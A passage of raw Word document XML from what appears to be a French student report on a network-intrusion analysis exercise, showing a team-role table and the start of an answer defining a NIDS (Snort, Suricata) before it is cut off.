          <w:p w14:paraId="0C670F03" w14:textId="0D37A6E2" w:rsidR="00951144" w:rsidRDefault="00AA5B2B" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Tâche</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>assignée</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00951144" w:rsidRPr="00615726" w14:paraId="32FA32EE" w14:textId="77777777" w:rsidTr="00615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9DB1B32" w14:textId="63437664" w:rsidR="00951144" w:rsidRDefault="0068325A" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Coordinateur</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15AF3278" w14:textId="20153268" w:rsidR="00951144" w:rsidRDefault="00615726" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Amyr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> HAMAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2FEF3F" w14:textId="3A033758" w:rsidR="00951144" w:rsidRPr="002763E4" w:rsidRDefault="00615726" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002763E4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reçoit l’alerte, organise le travail, communique avec le client</w:t>
            </w:r>
            <w:r w:rsidRPr="002763E4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068325A" w:rsidRPr="002763E4" w14:paraId="7BF10D6F" w14:textId="77777777" w:rsidTr="00615726">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56BEE5BE" w14:textId="7B49A918" w:rsidR="0068325A" w:rsidRDefault="002128AC" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Responsable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> du rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74809D2F" w14:textId="035A7706" w:rsidR="0068325A" w:rsidRDefault="00DA3222" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Mahé FAUVART</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="051B1B40" w14:textId="7A4D6121" w:rsidR="0068325A" w:rsidRPr="002763E4" w:rsidRDefault="002763E4" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002763E4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Centralise les réponses, rédige le rapport final</w:t>
            </w:r>
            <w:r w:rsidR="00823BA8">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068325A" w:rsidRPr="002763E4" w14:paraId="6AE3522A" w14:textId="77777777" w:rsidTr="00615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6BA2D09" w14:textId="697B593E" w:rsidR="0068325A" w:rsidRDefault="00DE462C" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Expert réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F5E819D" w14:textId="778C40B0" w:rsidR="0068325A" w:rsidRDefault="00DA3222" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="_Hlk197501068"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>DJALLAL CHAFAI</w:t>
            </w:r>
            <w:bookmarkEnd w:id="3"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="679F71F2" w14:textId="2480EE80" w:rsidR="0068325A" w:rsidRPr="002763E4" w:rsidRDefault="002763E4" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002763E4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Analyse du </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002763E4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">fichier </w:t>
            </w:r>
            <w:r w:rsidRPr="002763E4">
              <w:rPr>
                <w:rStyle w:val="CodeHTML"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002763E4">
              <w:rPr>
                <w:rStyle w:val="CodeHTML"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002763E4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, inspection des flux réseau</w:t>
            </w:r>
            <w:r w:rsidR="00823BA8">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE462C" w14:paraId="42F6A8B2" w14:textId="77777777" w:rsidTr="00615726">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="661C89CA" w14:textId="5620D126" w:rsidR="00DE462C" w:rsidRDefault="003448E5" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Expert </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>sécurité</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FDEF082" w14:textId="3AFA3A8A" w:rsidR="00DE462C" w:rsidRDefault="00DA3222" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Mahé FAUVART</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56BD9B2B" w14:textId="05942B26" w:rsidR="00DE462C" w:rsidRPr="00823BA8" w:rsidRDefault="00823BA8" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00823BA8">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Identification des techniques d’attaque</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE462C" w:rsidRPr="00F07FF2" w14:paraId="48779A7A" w14:textId="77777777" w:rsidTr="00615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8EDBB26" w14:textId="6218E3EC" w:rsidR="00DE462C" w:rsidRDefault="003448E5" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Responsable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>remédiation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23314479" w14:textId="21B925C7" w:rsidR="00DE462C" w:rsidRDefault="00DA3222" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>DJALLAL CHAFAI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="341C9B1E" w14:textId="257AFD1F" w:rsidR="00DE462C" w:rsidRPr="00F07FF2" w:rsidRDefault="00F07FF2" w:rsidP="00372CA9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F07FF2">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Élabore le plan d'action, évalue les mesures de défense</w:t>
            </w:r>
            <w:r w:rsidR="00823BA8">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FEACEEA" w14:textId="77777777" w:rsidR="00407A80" w:rsidRDefault="00407A80" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4166C6" w14:textId="77777777" w:rsidR="00DF1058" w:rsidRDefault="00DF1058" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D64929" w14:textId="77777777" w:rsidR="00DF1058" w:rsidRDefault="00DF1058" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE81780" w14:textId="77777777" w:rsidR="00DF1058" w:rsidRDefault="00DF1058" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="423C0822" w14:textId="77777777" w:rsidR="00DF1058" w:rsidRDefault="00DF1058" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66613208" w14:textId="77777777" w:rsidR="00DF1058" w:rsidRDefault="00DF1058" w:rsidP="009D0492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473C30DB" w14:textId="6F74F678" w:rsidR="00DF1058" w:rsidRDefault="00DF1058" w:rsidP="00DF1058">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc197502159"/>
      <w:r w:rsidRPr="00DF1058">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="71CBFF30" w14:textId="77777777" w:rsidR="00DF1058" w:rsidRDefault="00DF1058" w:rsidP="00DF1058">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2594304F" w14:textId="21DEFBF0" w:rsidR="00DF1058" w:rsidRPr="00343AFD" w:rsidRDefault="00343AFD" w:rsidP="00DF1058">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343AFD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Recall briefly what is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00343AFD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00343AFD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIDS and what is a SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7233CDCA" w14:textId="77777777" w:rsidR="00DF1058" w:rsidRPr="00DF1058" w:rsidRDefault="00DF1058" w:rsidP="00DF1058">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07961B0B" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc197502160"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIDS – Network Intrusion </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="24982CD2" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Un NIDS est un système de détection d’intrusion basé sur le réseau, conçu pour analyser le trafic afin d’identifier des comportements malveillants ou suspects. Il s’agit d’un dispositif non intrusif : il surveille le trafic sans l’interrompre, sauf s’il est configuré en mode IPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC3420" w14:textId="77777777" w:rsidR="009C3034" w:rsidRPr="009C3034" w:rsidRDefault="009C3034" w:rsidP="009C3034">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Installé sur un routeur ou un équipement dédié, un NIDS comme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C3034">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet :</w:t>
      </w:r>
    </w:p>
